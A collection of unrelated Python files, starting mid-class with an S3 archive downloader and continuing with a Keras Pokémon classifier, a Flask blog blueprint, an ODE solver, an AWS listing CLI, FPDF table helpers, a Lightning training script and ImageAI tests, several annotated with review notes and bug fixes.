                    print (self.s3.delete_object(Bucket=bucket, Key=item))
    def download_batch_data(self, folders, bucket=None, s3_folder='data', val_folders=None):
        """Download and extract the <dir>.tar.gz archive for every unique
        top-level directory referenced in *folders* (and *val_folders*).

        *folders* / *val_folders* may be lists or comma-separated strings.
        """
        if isinstance(folders, str):
            folders = folders.split(',')
        if val_folders:
            if isinstance(val_folders, str):
                val_folders = val_folders.split(',')
            # Copy so the caller's list is never mutated by extend().
            folders = folders.copy()
            folders.extend(val_folders.copy())
        downloaded_batch = []
        for video_dir in folders:
            directory = video_dir.split('/')[0]
            if directory not in downloaded_batch:
                tar_file = directory + '.tar.gz'
                self.download_file(localfile=tar_file, bucket=bucket, s3path=s3_folder)
                # NOTE(review): extractall() without member filtering trusts
                # the archive contents; acceptable only for a trusted bucket.
                with tarfile.open(os.path.join('/workspace', tar_file), "r:gz") as tarObj:
                    tarObj.extractall('/workspace/')
                downloaded_batch.append(directory)
|
# -*- coding: utf-8 -*-
"""
Created on Sun May 24 12:54:31 2020
@author: KReuZ_o13
"""
#setup thy packages
import tensorflow as tf
import numpy as np
import pandas as pd
import matplotlib as plt
import sklearn as sn #python ML package
from tensorflow import keras
from sklearn import preprocessing
#let's read the file using pandas
#for Windows users: forward slash not backslash
df = pd.read_csv('C:/Users/ADMIN1/Desktop/Projects/Python Projects/Machine_Learning/pokemon.csv')
#so, what columns do we have? run in console
df.columns
#the data we want to work with are these columns!
df = df[['isLegendary','Generation', 'Type_1', 'Type_2', 'HP', 'Attack', 'Defense', 'Sp_Atk', 'Sp_Def', 'Speed','Color','Egg_Group_1','Height_m','Weight_kg','Body_Style']]
#some of our data isn't in integers, so we have to convert it.
df['isLegendary'] = df['isLegendary'].astype(int)
#we'll have to create dummy boolean variables(then convert to int) for pokemon type to prevent ranking elements
#we'll create a function for this
#get.dummies is used to create a dummy dataframe of that category
#concat is used to add it to our original data frame
#drop is used to remove the original columns since we have some new shiny ones
def dummy_creation(df, dummy_categories):
    """One-hot encode each column named in *dummy_categories*.

    For every listed column, the dummy columns produced by
    ``pd.get_dummies`` are appended to the frame and the original
    categorical column is dropped. Returns the transformed frame.
    """
    for category in dummy_categories:
        one_hot = pd.get_dummies(df[category])
        df = pd.concat([df, one_hot], axis=1).drop(category, axis=1)
    return df
#now let's run the function for the groups!
# One-hot encode every categorical column in a single pass.
df = dummy_creation(df, ['Egg_Group_1', 'Body_Style', 'Color','Type_1', 'Type_2'])
#now we need to split the data into 0.7 train and 0.3 test
#This function takes any Pokémon whose "Generation" label 1 and putting it into the test dataset,
#and putting everyone else in the training dataset.
#It then drops the Generation category from the dataset.
def train_test_splitter(DataFrame, column):
    """Split *DataFrame* into train/test sets on ``column == 1``.

    Rows where *column* equals 1 (Generation-1 Pokémon in this script)
    become the test set; all other rows are the training set. The split
    column itself is dropped from both frames.

    Bug fix: the row masks previously read the module-level ``df`` instead
    of the *DataFrame* argument, so the function only worked when called on
    that exact global frame (and then only by index alignment).
    """
    df_train = DataFrame.loc[DataFrame[column] != 1]
    df_test = DataFrame.loc[DataFrame[column] == 1]
    df_train = df_train.drop(column, axis=1)
    df_test = df_test.drop(column, axis=1)
    return df_train, df_test
# Generation 1 becomes the held-out test set; all other generations train.
df_train, df_test = train_test_splitter(df, 'Generation')
#now we need to separate the labels from the data itself
#you dont give a child the answers when you want to teach them
#ergo, we drop the Legendary category since that's what we're looking for
#by creating this nifty function that can drop any column
def label_delineator(df_train, df_test, label):
    """Separate the *label* column from the features in both frames.

    Returns four numpy arrays:
    (train_data, train_labels, test_data, test_labels).
    """
    def _split(frame):
        # Features are every column except *label*; labels the column itself.
        return frame.drop(label, axis=1).values, frame[label].values
    train_data, train_labels = _split(df_train)
    test_data, test_labels = _split(df_test)
    return train_data, train_labels, test_data, test_labels
#now, run the function and remove the isLegendary category!
# From here on everything is numpy arrays, not DataFrames.
train_data, train_labels, test_data, test_labels = label_delineator(df_train, df_test, 'isLegendary')
#now that the data has been adequately prepped, let's normalise it!
#this ensures everything is on the same scale
#we'll do that by creating another function
def data_normalizer(train_data, test_data):
    """Min-max scale the features into [0, 1].

    The scaler is fitted on the training data only and then applied to both
    splits, so train and test share a single scale and no information from
    the test set leaks into preprocessing.

    Bug fix: the previous version fitted a *second* scaler on the test set,
    giving each split a different scale for the same feature.
    """
    scaler = preprocessing.MinMaxScaler().fit(train_data)
    return scaler.transform(train_data), scaler.transform(test_data)
#now run the function and min-max your data!
train_data, test_data = data_normalizer(train_data, test_data)
#ta-dah! now we can move ahead to machine learning! fireworks
#we'll have two fully connected neural layers here
#layer 1 is a 'ReLU' (Rectified Linear Unit)' activation function
#we need to specify input_size, which is the shape of an entry in our dataset
#layer 2 is a softmax one!this is a type of logistic regression done for situations with multiple cases
#with the softmax we delineate the possible identities of the Pokémon into 2 probability groups corresponding to the possible labels
# Number of input features after one-hot encoding.
length = train_data.shape[1]
model = keras.Sequential()
model.add(keras.layers.Dense(500, activation='relu', input_shape=[length,]))
model.add(keras.layers.Dense(2, activation='softmax'))
#now we need to compile our data
#there are two important concepts: the optimizer which is used to guess the relation
#and the loss module which tells the computer how off it is.
#there's also metrics, which specifies which information it provides so we can analyze the model
model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
#now fit thy model, a.k.a. train your model
# NOTE(review): 800 epochs on a dataset this small is likely to overfit.
model.fit(train_data, train_labels, epochs=800)
#now, let's test the model
#model.evaluate shows how accurate the model is in loss and accuracy values
loss_value, accuracy_value = model.evaluate(test_data, test_labels)
print("The loss value is ",loss_value)
print("The accuracy value is ", accuracy_value)
#now, let's try predicting something!
#we do this with the predict function!
#research the argmax thing
def predictor(test_data, test_labels, index):
    """Predict every test sample with the global *model* and report whether
    the prediction at *index* matches its true label.

    Returns the full prediction array (one softmax row per sample).
    """
    prediction = model.predict(test_data)
    guessed = np.argmax(prediction[index])
    actual = test_labels[index]
    if guessed == actual:
        print(f'This was correctly predicted to be a \"{actual}\"!')
    else:
        print(f'This was incorrectly predicted to be a \"{guessed}\". It was actually a \"{actual}\".')
    return prediction
#now, gaze upon your data. find the pokedex number and randomly feed it in
#mewtwo is number 150, and we're ripping off the tutorial so...
# Index 149 is the 0-based position within the Generation-1 test split.
predictor(test_data, test_labels, 149)
import datetime
from flask import render_template, Blueprint, abort
from flask_login import current_user
from wfdb.models import db, Post, Comment, User
from wfdb.forms import CommentForm
# Blueprint grouping all blog views under the /blog URL prefix; templates
# are resolved relative to ../templates/blog.
blog_blueprint = Blueprint(
    'blog',
    __name__,
    template_folder='../templates/blog',
    url_prefix="/blog"
)
@blog_blueprint.route("/")
def blog():
    """Render the blog index listing all posts, newest first."""
    all_posts = Post.query.order_by(Post.publish_date.desc()).all()
    return render_template("blog.html", posts=all_posts)
@blog_blueprint.route("/<int:post_id>", methods=["GET", "POST"])
def post(post_id):
    """Show a single post and accept a new comment on valid POST.

    Anonymous users attempting to comment get a 403; on success the
    comment is stored and the page re-rendered with the same form.
    """
    entry = Post.query.get_or_404(post_id)
    form = CommentForm()
    if form.validate_on_submit():
        # Only authenticated users may comment.
        if current_user.is_anonymous:
            abort(403)
        comment = Comment()
        comment.user = current_user
        comment.post = entry
        comment.text = form.text.data
        comment.date = datetime.datetime.now()
        db.session.add(comment)
        db.session.commit()
    return render_template("post.html", post=entry, form=form)
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp
class ExponentialDecay():
    """Model of exponential decay: u'(t) = -a * u(t)."""
    def __init__(self, a):
        """Store the decay constant *a*."""
        self.a = a
    def __call__(self, t, u):
        """Right-hand side of the ODE: return -a*u at time *t*.

        Parameters: t -- time at which the derivative is evaluated.
                    u -- value of the decay function at time t.
        Returns: the derivative of u at time t.
        """
        return -self.a * u
    def solve(self, u0, T, dt):
        """Integrate the ODE with scipy's solve_ivp over [0, T].

        Parameters: u0 -- initial value u(0).
                    T  -- end time of the integration.
                    dt -- spacing of the requested sample times.
        Returns: (times, values) — arrays of sample times and the
                 corresponding solution values.
        """
        sample_times = np.arange(0, T, dt)
        result = solve_ivp(self, [0, T], [u0], t_eval=sample_times)
        return result.t, result.y[0]
if __name__ == "__main__":
    #plotting a test run
    a = 0.4     # Decay constants
    u0 = 3.2    # Function value u(t) for some known time t
    T = 5.      # Timespan
    dt = 0.1    # Timestep
    decay_model = ExponentialDecay(a)
    t, u = decay_model.solve(u0, T, dt)
    plt.style.use("classic")
    plt.plot(t, u)
    plt.grid()
    # Blocks until the plot window is closed.
    plt.show()
|
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import os, sys, copy, time
from datetime import datetime
from . import register_parser
from .util import Timestamp, paginate, describe_cidr, add_time_bound_args
from .util.printing import page_output, tabulate, GREEN, BLUE
from .util.aws import ARN, resolve_instance_id, resources, clients
from .util.compat import timestamp
def column_completer(parser, **kwargs):
    """argcomplete completer: suggest public attribute names of the boto3
    subresource that this parser's command lists."""
    resource = getattr(resources, parser.get_default("resource"))
    subresource = getattr(resource, parser.get_default("subresource"))
    # Instantiate with a dummy id just to introspect the attribute names.
    return [attr for attr in dir(subresource("")) if not attr.startswith("_")]
def register_listing_parser(function, **kwargs):
    """Register *function* as a subcommand and give it a ``--columns``
    option with tab completion.

    A ``column_defaults`` keyword, when present, is consumed here and used
    as the default value of ``--columns``.
    """
    if "column_defaults" in kwargs:
        col_def = {"default": kwargs.pop("column_defaults")}
    else:
        col_def = {}
    parser = register_parser(function, **kwargs)
    col_arg = parser.add_argument("-c", "--columns", nargs="+", help="Names of columns to print", **col_def)
    col_arg.completer = column_completer
    return parser
def register_filtering_parser(function, **kwargs):
    """Register a listing subcommand that additionally accepts --filter
    and --tag options (consumed by filter_collection)."""
    parser = register_listing_parser(function, **kwargs)
    option_specs = (
        ("-f", "--filter", "FILTER_NAME=VALUE",
         "Filter(s) to apply to output, e.g. --filter state=available"),
        ("-t", "--tag", "TAG_NAME=VALUE",
         "Tag(s) to filter output by"),
    )
    for short_opt, long_opt, metavar, help_text in option_specs:
        parser.add_argument(short_opt, long_opt, nargs="+", default=[], metavar=metavar, help=help_text)
    return parser
def filter_collection(collection, args):
    """Apply the command line --filter and --tag arguments to a boto3
    collection and return the filtered collection.

    Each spec has the form NAME=VALUE; tag specs become "tag:NAME" filters.
    """
    filter_specs = []
    # TODO: shlex?
    for clause in getattr(args, "filter", []):
        field, value = clause.split("=", 1)
        if collection.__class__.__name__ == "ec2.instancesCollectionManager":
            # EC2 instance filters use dashed names, and "state" is spelled
            # "instance-state-name" in the EC2 API.
            field = field.replace("_", "-")
            if field == "state":
                field = "instance-state-name"
        filter_specs.append(dict(Name=field, Values=[value]))
    for clause in getattr(args, "tag", []):
        tag_name, tag_value = clause.split("=", 1)
        filter_specs.append(dict(Name="tag:" + tag_name, Values=[tag_value]))
    return collection.filter(Filters=filter_specs)
def filter_and_tabulate(collection, args, **kwargs):
    """Tabulate *collection* after applying the --filter/--tag arguments."""
    return tabulate(filter_collection(collection, args), args, **kwargs)
def add_name(instance):
    """Attach a ``name`` attribute to *instance*: the value of its "Name"
    tag when present, otherwise its instance id. Returns the instance."""
    resolved = instance.id
    for tag in instance.tags or []:
        if tag["Key"] == "Name":
            resolved = tag["Value"]
    instance.name = resolved
    return instance
def ls(args):
    """List EC2 instances (the ``ls`` subcommand).

    Always includes the tags and launch_time columns, resolves each
    instance's Name tag into a leading "name" column, and pages the
    filtered, tabulated result.
    """
    for col in "tags", "launch_time":
        if col not in args.columns:
            args.columns.append(col)
    instances = [add_name(i) for i in filter_collection(resources.ec2.instances, args)]
    args.columns = ["name"] + args.columns
    # Flatten structured API fields into single printable cells.
    cell_transforms = {
        "state": lambda x, r: x["Name"],
        "security_groups": lambda x, r: ", ".join(sg["GroupName"] for sg in x),
        "iam_instance_profile": lambda x, r: x.get("Arn", "").split("/")[-1] if x else None
    }
    page_output(tabulate(instances, args, cell_transforms=cell_transforms))
parser = register_filtering_parser(ls, help="List EC2 instances")
parser.add_argument("--sort-by")
def console(args):
    """Print the EC2 console output of one instance through the pager."""
    instance_id = resolve_instance_id(args.instance)
    # Shown when the API returns no "Output" key yet.
    err = "[No console output received for {}. Console output may lag by several minutes.]".format(instance_id)
    page_output(resources.ec2.Instance(instance_id).console_output().get("Output", err))
parser = register_parser(console, help="Get console output for an EC2 instance")
parser.add_argument("instance")
def images(args):
    """List AMIs owned by this account."""
    page_output(filter_and_tabulate(resources.ec2.images.filter(Owners=["self"]), args))
parser = register_filtering_parser(images, help="List EC2 AMIs")
parser.add_argument("--sort-by")
# Memo of peer descriptions, keyed by CidrIp or security group id.
peer_desc_cache = {}
def describe_peer(peer):
    """Return (label, description) for one security-group rule peer.

    A peer is either a CIDR dict ({"CidrIp": ...}) or a group reference
    ({"GroupId": ...}); lookups are cached in peer_desc_cache.
    """
    if "CidrIp" in peer:
        if peer["CidrIp"] not in peer_desc_cache:
            peer_desc_cache[peer["CidrIp"]] = describe_cidr(peer["CidrIp"])
        return peer["CidrIp"], peer_desc_cache[peer["CidrIp"]]
    else:
        if peer["GroupId"] not in peer_desc_cache:
            peer_desc_cache[peer["GroupId"]] = resources.ec2.SecurityGroup(peer["GroupId"])
        return peer_desc_cache[peer["GroupId"]].group_name, peer_desc_cache[peer["GroupId"]].description
def security_groups(args):
    """List all security-group rules, one table row per peer of each rule."""
    def format_rule(row, perm, peer, egress=False):
        # Renders one permission as "local-port direction peer:peer-port".
        peer_desc, row.peer_description = describe_peer(peer)
        row.rule = BLUE("●") + ":" + str(perm.get("FromPort" if egress else "ToPort", "*"))
        row.rule += GREEN("▶") if egress else GREEN("◀")
        row.rule += peer_desc + ":" + str(perm.get("ToPort" if egress else "FromPort", "*"))
        row.proto = "*" if perm["IpProtocol"] == "-1" else perm["IpProtocol"]
    table = []
    for sg in resources.ec2.security_groups.all():
        # Ingress rules come first; indexes past len(ip_permissions) are egress.
        for i, perm in enumerate(sg.ip_permissions + sg.ip_permissions_egress):
            for peer in perm["IpRanges"] + perm["UserIdGroupPairs"]:
                table.append(copy.copy(sg))
                format_rule(table[-1], perm, peer, egress=True if i > len(sg.ip_permissions) - 1 else False)
    page_output(tabulate(table, args))
parser = register_filtering_parser(security_groups, help="List EC2 security groups")
def acls(args):
    """List EC2 network ACLs."""
    page_output(filter_and_tabulate(resources.ec2.network_acls, args))
parser = register_filtering_parser(acls, help="List EC2 network ACLs")
def logs(args):
    """List CloudWatch Logs groups and streams, or delegate to grep().

    When a group plus a stream or a time bound is given, this is really a
    content search: forward to grep() with no pattern and no following.
    """
    if args.log_group and (args.log_stream or args.start_time or args.end_time):
        args.pattern, args.follow = None, False
        return grep(args)
    table = []
    group_cols = ["logGroupName"]
    stream_cols = ["logStreamName", "lastIngestionTime", "storedBytes"]
    args.columns = group_cols + stream_cols
    for group in paginate(clients.logs.get_paginator("describe_log_groups")):
        if args.log_group and group["logGroupName"] != args.log_group:
            continue
        n = 0
        for stream in paginate(clients.logs.get_paginator("describe_log_streams"),
                               logGroupName=group["logGroupName"], orderBy="LastEventTime", descending=True):
            now = datetime.utcnow().replace(microsecond=0)
            # Replace the raw epoch-milliseconds with an ingestion age.
            stream["lastIngestionTime"] = now - datetime.utcfromtimestamp(stream.get("lastIngestionTime", 0) // 1000)
            table.append(dict(group, **stream))
            n += 1
            # Cap how many (most recent) streams are shown per group.
            if n >= args.max_streams_per_group:
                break
    page_output(tabulate(table, args))
parser = register_parser(logs, help="List CloudWatch Logs groups and streams")
parser.add_argument("--max-streams-per-group", "-n", type=int, default=8)
parser.add_argument("--sort-by", default="lastIngestionTime:reverse")
parser.add_argument("log_group", nargs="?", help="CloudWatch log group")
parser.add_argument("log_stream", nargs="?", help="CloudWatch log stream")
add_time_bound_args(parser)
def grep(args):
    """Print CloudWatch Logs events matching the given pattern/stream/time
    bounds; with --follow, poll for more events every second."""
    filter_args = dict(logGroupName=args.log_group)
    if args.log_stream:
        filter_args.update(logStreamNames=[args.log_stream])
    if args.pattern:
        filter_args.update(filterPattern=args.pattern)
    if args.start_time:
        filter_args.update(startTime=int(timestamp(args.start_time) * 1000))
    if args.end_time:
        filter_args.update(endTime=int(timestamp(args.end_time) * 1000))
    num_results = 0
    while True:
        for event in paginate(clients.logs.get_paginator("filter_log_events"), **filter_args):
            if "timestamp" not in event or "message" not in event:
                continue
            print(str(Timestamp(event["timestamp"])), event["message"])
            num_results += 1
        if args.follow:
            # NOTE(review): the next iteration re-queries with the same
            # startTime, so previously printed events may repeat — confirm
            # whether this is acceptable for follow mode.
            time.sleep(1)
        else:
            # NOTE(review): this *returns* a SystemExit instance instead of
            # raising it; presumably the CLI dispatcher passes return values
            # to sys.exit() — confirm before changing.
            return SystemExit(os.EX_OK if num_results > 0 else os.EX_DATAERR)
grep_parser = register_parser(grep, help="Filter and print events in a CloudWatch Logs stream or group of streams")
grep_parser.add_argument("pattern", help="""CloudWatch filter pattern to use. Case-sensitive. See
    http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/FilterAndPatternSyntax.html""")
grep_parser.add_argument("log_group", help="CloudWatch log group")
grep_parser.add_argument("log_stream", nargs="?", help="CloudWatch log stream")
grep_parser.add_argument("--follow", "-f", help="Repeat search continuously instead of running once",
                         action="store_true")
add_time_bound_args(grep_parser)
def clusters(args):
    """List all ECS clusters in the account."""
    cluster_arns = sum([p["clusterArns"] for p in clients.ecs.get_paginator("list_clusters").paginate()], [])
    page_output(tabulate(clients.ecs.describe_clusters(clusters=cluster_arns)["clusters"], args))
parser = register_listing_parser(clusters, help="List ECS clusters")
def tasks(args):
    """List ECS tasks across all clusters, filtered by desired status."""
    cluster_arns = sum([p["clusterArns"] for p in clients.ecs.get_paginator("list_clusters").paginate()], [])
    table = []
    for cluster_arn in cluster_arns:
        list_tasks_args = dict(cluster=cluster_arn, desiredStatus=args.desired_status)
        paginator = clients.ecs.get_paginator("list_tasks")
        task_arns = sum([p["taskArns"] for p in paginator.paginate(**list_tasks_args)], [])
        # describe_tasks requires a non-empty task list.
        if task_arns:
            for task in clients.ecs.describe_tasks(cluster=cluster_arn, tasks=task_arns)["tasks"]:
                table.append(task)
    page_output(tabulate(table, args))
parser = register_listing_parser(tasks, help="List ECS tasks")
parser.add_argument("--desired-status", choices={"RUNNING", "PENDING", "STOPPED"}, default="RUNNING")
def taskdefs(args):
    """List all ECS task definitions."""
    table = []
    for taskdef_arn in clients.ecs.list_task_definitions()["taskDefinitionArns"]:
        table.append(clients.ecs.describe_task_definition(taskDefinition=taskdef_arn)["taskDefinition"])
    page_output(tabulate(table, args))
parser = register_listing_parser(taskdefs, help="List ECS task definitions",
                                 column_defaults=["family", "revision", "containerDefinitions"])
def sirs(args):
    """List EC2 spot instance requests."""
    page_output(tabulate(clients.ec2.describe_spot_instance_requests()["SpotInstanceRequests"], args))
parser = register_listing_parser(sirs, help="List EC2 spot instance requests")
def sfrs(args):
    """List EC2 spot fleet requests."""
    page_output(tabulate(paginate(clients.ec2.get_paginator("describe_spot_fleet_requests")), args))
parser = register_listing_parser(sfrs, help="List EC2 spot fleet requests")
parser.add_argument("--trim-col-names", nargs="+", default=["SpotFleetRequestConfig.", "SpotFleetRequest"])
parser.add_argument("--sort-by")
def key_pairs(args):
    """List EC2 SSH key pairs."""
    page_output(tabulate(resources.ec2.key_pairs.all(), args))
parser = register_listing_parser(key_pairs, help="List EC2 SSH key pairs", column_defaults=["name", "key_fingerprint"])
def subnets(args):
    """List EC2 subnets (filterable)."""
    page_output(filter_and_tabulate(resources.ec2.subnets, args))
parser = register_filtering_parser(subnets, help="List EC2 VPCs and subnets")
def tables(args):
    """List DynamoDB tables."""
    page_output(tabulate(resources.dynamodb.tables.all(), args))
parser = register_listing_parser(tables, help="List DynamoDB tables")
def subscriptions(args):
    """List SNS subscriptions."""
    page_output(tabulate(paginate(clients.sns.get_paginator("list_subscriptions")), args))
parser = register_listing_parser(subscriptions, help="List SNS subscriptions",
                                 column_defaults=["SubscriptionArn", "Protocol", "Endpoint"])
def limits(args):
    """
    Describe limits in effect on your AWS account. See also https://console.aws.amazon.com/ec2/v2/home#Limits:
    """
    # https://aws.amazon.com/about-aws/whats-new/2014/06/19/amazon-ec2-service-limits-report-now-available/
    # Console-only APIs: getInstanceLimits, getAccountLimits, getAutoscalingLimits, getHostLimits
    # http://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.Client.describe_limits
    # Only these few limits are exposed through describe_account_attributes.
    attrs = ["max-instances", "vpc-max-security-groups-per-interface", "vpc-max-elastic-ips"]
    table = clients.ec2.describe_account_attributes(AttributeNames=attrs)["AccountAttributes"]
    page_output(tabulate(table, args))
parser = register_parser(limits)
def cmks(args):
    """List KMS keys, annotated with their aliases when present."""
    aliases = {alias.get("TargetKeyId"): alias for alias in paginate(clients.kms.get_paginator("list_aliases"))}
    table = []
    for key in paginate(clients.kms.get_paginator("list_keys")):
        # Merge alias fields (e.g. AliasName) into the key record.
        key.update(aliases.get(key["KeyId"], {}))
        table.append(key)
    page_output(tabulate(table, args))
parser = register_parser(cmks, help="List KMS Customer Master Keys")
def certificates(args):
    """List ACM SSL/TLS certificates."""
    page_output(tabulate(paginate(clients.acm.get_paginator("list_certificates")), args))
parser = register_parser(certificates, help="List Amazon Certificate Manager SSL certificates")
|
from fpdf import FPDF
class PDF(FPDF):
    """FPDF subclass with helpers that render tabular data three ways:
    plain bordered, width-tuned, and alternating-fill colored."""
    def basic_table(self, headings, rows, col_width=40):
        """Render a plain table with a full border around every cell.

        :param headings: sequence of column header strings
        :param rows: sequence of rows, each a sequence of cell strings
        :param col_width: width in mm of every column (default 40, the
            previously hard-coded value, so existing callers are unchanged)
        """
        for heading in headings:
            self.cell(col_width, 7, heading, 1)
        self.ln()
        for row in rows:
            for col in row:
                self.cell(col_width, 6, col, 1)
            self.ln()
    def improved_table(self, headings, rows, col_widths=(42, 39, 35, 40)):
        """Render a 4-column table with per-column widths, centered headers,
        right-aligned numeric columns, and only left/right cell borders."""
        for col_width, heading in zip(col_widths, headings):
            self.cell(col_width, 7, heading, 1, 0, "C")
        self.ln()
        for row in rows:
            self.cell(col_widths[0], 6, row[0], "LR")
            self.cell(col_widths[1], 6, row[1], "LR")
            self.cell(col_widths[2], 6, row[2], "LR", 0, "R")
            self.cell(col_widths[3], 6, row[3], "LR", 0, "R")
            self.ln()
        # Closure line:
        self.cell(sum(col_widths), 0, "", "T")
    def colored_table(self, headings, rows, col_widths=(42, 39, 35, 42)):
        """Render a 4-column table with a colored header row and rows of
        alternating fill color.

        NOTE(review): the default last-column width (42) differs from
        improved_table's (40) — confirm whether that is intentional.
        """
        # Colors, line width and bold font:
        self.set_fill_color(255, 100, 0)
        self.set_text_color(255)
        self.set_draw_color(255, 0, 0)
        self.set_line_width(0.3)
        self.set_font(style="B")
        for col_width, heading in zip(col_widths, headings):
            self.cell(col_width, 7, heading, 1, 0, "C", True)
        self.ln()
        # Color and font restoration:
        self.set_fill_color(224, 235, 255)
        self.set_text_color(0)
        self.set_font()
        # Alternate the fill color from row to row.
        fill = False
        for row in rows:
            self.cell(col_widths[0], 6, row[0], "LR", 0, "L", fill)
            self.cell(col_widths[1], 6, row[1], "LR", 0, "L", fill)
            self.cell(col_widths[2], 6, row[2], "LR", 0, "R", fill)
            self.cell(col_widths[3], 6, row[3], "LR", 0, "R", fill)
            self.ln()
            fill = not fill
        self.cell(sum(col_widths), 0, "", "T")
def load_data_from_csv(csv_filepath):
    """Read a comma-separated file and split it into headings and rows.

    :param csv_filepath: path of the CSV file to read (UTF-8)
    :return: (headings, rows) — the first row's column names, and a list
        of the remaining rows (each a list of strings)
    """
    # Bug fix: the csv module was used but never imported in this module,
    # so any call raised NameError. Imported locally to keep the fix
    # self-contained.
    import csv
    headings, rows = [], []
    with open(csv_filepath, encoding="utf8") as csv_file:
        for row in csv.reader(csv_file, delimiter=","):
            if not headings:  # extracting column names from first row:
                headings = row
            else:
                rows.append(row)
    return headings, rows
# NOTE(review): var_beraternummer / var_mandantennummer / var_stmonat /
# var_stjahr are not defined anywhere in this module — this block raises
# NameError unless they are injected before execution. Confirm where these
# variables come from.
col_names, data = load_data_from_csv("export/"+var_beraternummer+"_"+var_mandantennummer+"_"+var_stmonat+"_"+var_stjahr+"_Export_Steuer.csv") ##
pdf = FPDF(orientation="landscape", unit="mm")
pdf.add_page()
pdf.set_font("helvetica", "B", 16)
pdf.cell(278, 10, "Hilfsliste berechnete und exportierte Werte im Abrechnungszeitraum: "+var_stmonat+"/"+var_stjahr, 1, align="C")
# NOTE(review): the table data loaded above is never rendered — only the
# title cell is written; the commented example below shows how the PDF
# table helpers would be used.
pdf.output("tuto2.pdf")
#col_names, data = load_data_from_csv("countries.txt")
#pdf = PDF()
#pdf.set_font("helvetica", size=14)
#pdf.add_page()
#pdf.basic_table(col_names, data)
#pdf.add_page()
#pdf.improved_table(col_names, data)
#pdf.add_page()
#pdf.colored_table(col_names, data)
#pdf.output("tuto5.pdf")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 11 14:14:57 2021
@author: drjc
"""
from datetime import datetime
from torch.utils.data import DataLoader, random_split
import pytorch_lightning as pl
from pytorch_lightning import Trainer
from pytorch_lightning.loggers.test_tube import TestTubeLogger
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning.utilities.parsing import AttributeDict
from models import YourModel
from data_modules import MedNIST
from constants import DATADIR
from IPython import embed
#%%
def train(hparams):
    """Build callbacks, logger and Trainer from *hparams*, then fit
    YourModel on the MedNIST data module."""
    early_stop_callback = EarlyStopping(
        monitor='val_loss_epoch',
        # NOTE(review): min_delta=1 is unusually large — the epoch val loss
        # must improve by >= 1.0 to reset patience; confirm this is intended.
        min_delta=1,
        patience=10,
        verbose=True,
        mode='min',
        strict=False
    )
    # Used only to name the logger directory (one per calendar day).
    date_time = datetime.now().strftime("%Y-%m-%d")
    ckpt_callback = ModelCheckpoint(
        dirpath=None,
        monitor='val_loss_epoch',
        verbose=1,
        save_top_k=5,
        save_weights_only=True,
        mode='min',
        period=1,
        # Checkpoint filenames embed epoch and train/val losses.
        filename='{epoch}-{train_loss_epoch:.3f}-{val_loss_epoch:.3f}'
    )
    logger = TestTubeLogger(save_dir=hparams.log_path,
                            name=date_time)
    trainer = Trainer(
        accelerator=hparams.accel,
        auto_lr_find=hparams.autolr,
        benchmark=True,
        callbacks=[ckpt_callback, early_stop_callback],
        check_val_every_n_epoch=hparams.check_val_n,
        fast_dev_run=False,
        gpus=hparams.gpus,
        logger=logger,
        max_epochs=hparams.max_epochs,
        # NOTE(review): overfit_batches=16 restricts training to 16 batches
        # (a debugging aid) — remove before a full training run.
        overfit_batches=16,
        profiler=False,
    )
    data = MedNIST(hparams)
    # embed()
    model = YourModel(hparams)
    trainer.fit(model, data)
if __name__ == "__main__":
    # All hyperparameters in one flat dict; AttributeDict allows
    # attribute-style access (hparams.lr, hparams.gpus, ...).
    hparams = AttributeDict(
        {
            'accel': None,
            'autolr': False,
            'batch_size': 2,
            'check_val_n': 1,
            'dev': False,
            'gpus': None,
            'log_path': DATADIR.joinpath('logs'),
            'lr': 0.0001,
            'lr_schedule': 'ROP',
            'max_epochs': 100,
            'num_nodes': 1,
            'num_workers': 0,
            'pl_ver': pl.__version__,  # recorded for reproducibility
            'seed': 22117,
            'weight_decay': 1e-07
        })
    train(hparams)
|
from imageai.Classification import ImageClassification
import os
import cv2
import pytest
from os.path import dirname
main_folder = os.getcwd()
def test_recognition_model_mobilenetv2():
    """MobileNetV2 classification of a sample image returns parallel
    str/float lists (labels and confidences)."""
    predictor = ImageClassification()
    predictor.setModelTypeAsMobileNetV2()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "mobilenet_v2.h5"))
    predictor.loadModel()
    # BUG FIX: main_folder was passed twice to os.path.join; the second
    # absolute component silently discarded the first.
    predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, "data-images", "1.jpg"))
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_resnet():
    """ResNet50 classification of a sample image returns parallel
    str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsResNet50()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "resnet50_imagenet_tf.2.0.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, "data-images", "1.jpg"))
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_inceptionv3():
    """InceptionV3 classification of a sample image returns parallel
    str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsInceptionV3()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "inception_v3_weights_tf_dim_ordering_tf_kernels.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, "data-images", "1.jpg"))
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_densenet():
    """DenseNet121 classification of a sample image returns parallel
    str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsDenseNet121()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "DenseNet-BC-121-32.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, "data-images", "1.jpg"))
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
